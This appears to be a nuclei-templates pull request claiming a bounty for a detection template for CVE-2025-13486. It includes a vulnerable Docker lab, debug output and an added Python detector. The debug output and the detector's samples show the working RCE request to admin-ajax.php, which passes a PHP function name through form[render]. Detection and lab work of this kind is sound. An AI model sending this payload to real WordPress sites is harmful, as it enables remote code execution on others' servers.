/claim #14212

PR Information

Template validation

  • Validated with a host running a vulnerable version and/or configuration (True Positive)
  • Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details

Vulnerable Docker Environment: https://github.com/KrE80r/cve-2025-13486-vuln-setup

git clone https://github.com/KrE80r/cve-2025-13486-vuln-setup
cd cve-2025-13486-vuln-setup
# 1. Download plugins (run once)
./download-plugins.sh
# 2. Add ACF Pro to plugins/ (required - see script output for options)
# 3. Start environment
docker compose up -d
# 4. Wait ~30 seconds for setup, then test
nuclei -t CVE-2025-13486.yaml -u http://localhost:8888

Debug Output

nuclei -u http://localhost:8888 -t CVE-2025-13486.yaml -debug
[INF] [CVE-2025-13486] Dumped HTTP request for http://localhost:8888
GET / HTTP/1.1
Host: localhost:8888
[INF] [CVE-2025-13486] Dumped HTTP request for http://localhost:8888/wp-admin/admin-ajax.php
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=acfe/form/render_form_ajax&nonce=a449292b33&form[render]=print_r&form[rce_proof]=CVE2025RCE36P4GWD6DV0Oxy1GDf5lq2QEvnt
[CVE-2025-13486] [http] [critical] http://localhost:8888/wp-admin/admin-ajax.php
[INF] Scan completed in 458ms. 2 matches found.

Additional References:

Claim

Total prize pool $100
Total paid $0
Status Pending
Submitted December 05, 2025
Last updated December 05, 2025

Contributors

KrE80r (@KrE80r): 100%

Sponsors

ProjectDiscovery (@projectdiscovery): $100
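
The probe shown in the debug output above can be matched defensively in captured web traffic. The following is an added example, not part of the PR or the nuclei template: it flags POSTs to admin-ajax.php that carry the `acfe/form/render_form_ajax` action together with a `form[render]` value shaped like a PHP function name. The tuple input format, the array-key handling, the `form[name]` field and all sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Path, action and parameter name as shown in the debug output on this page.
AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "acfe/form/render_form_ajax"
RENDER_KEY = "form[render]"
# Bare PHP function name such as "print_r", optionally namespaced or Class::method.
CALLABLE_RE = re.compile(r"\\?[A-Za-z_]\w*(?:(?:\\|::)[A-Za-z_]\w*)*")


def inspect_request(method, target, body):
    """Return the callable-looking form[render] values in one request, or []."""
    url = urlsplit(target)
    if method.upper() != "POST" or url.path != AJAX_PATH:
        return []
    # parse_qsl percent-decodes, so form%5Brender%5D=... is matched as well.
    # The query string is included because admin-ajax.php reads action from $_REQUEST.
    params = parse_qsl(url.query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    if ("action", ACTION) not in params:
        return []
    hits = []
    for key, value in params:
        # Assumption: array forms such as form[render][0] are treated the same way.
        is_render = key == RENDER_KEY or key.startswith(RENDER_KEY + "[")
        if is_render and CALLABLE_RE.fullmatch(value.strip()):
            hits.append(value.strip())
    return hits


# Constructed sample requests (method, request target, body); not real traffic.
SAMPLES = [
    ("POST", AJAX_PATH,
     "action=acfe/form/render_form_ajax&nonce=0000000000&form[render]=print_r&form[rce_proof]=MARKER"),
    ("POST", AJAX_PATH + "?action=acfe%2Fform%2Frender_form_ajax",
     "nonce=0000000000&form%5Brender%5D=print_r"),
    ("POST", AJAX_PATH, "action=heartbeat&_nonce=0000000000"),
    ("POST", AJAX_PATH, "action=acfe/form/render_form_ajax&form[name]=contact"),
]


def scan(samples):
    """Return (index, values) for each sample with a callable-looking render value."""
    return [(i, v) for i, s in enumerate(samples) if (v := inspect_request(*s))]


if __name__ == "__main__":
    for index, values in scan(SAMPLES):
        print(f"sample {index}: form[render] = {values}")
```

Matching on the decoded parameter names rather than on raw substrings keeps percent-encoded variants of the same request from slipping past the check.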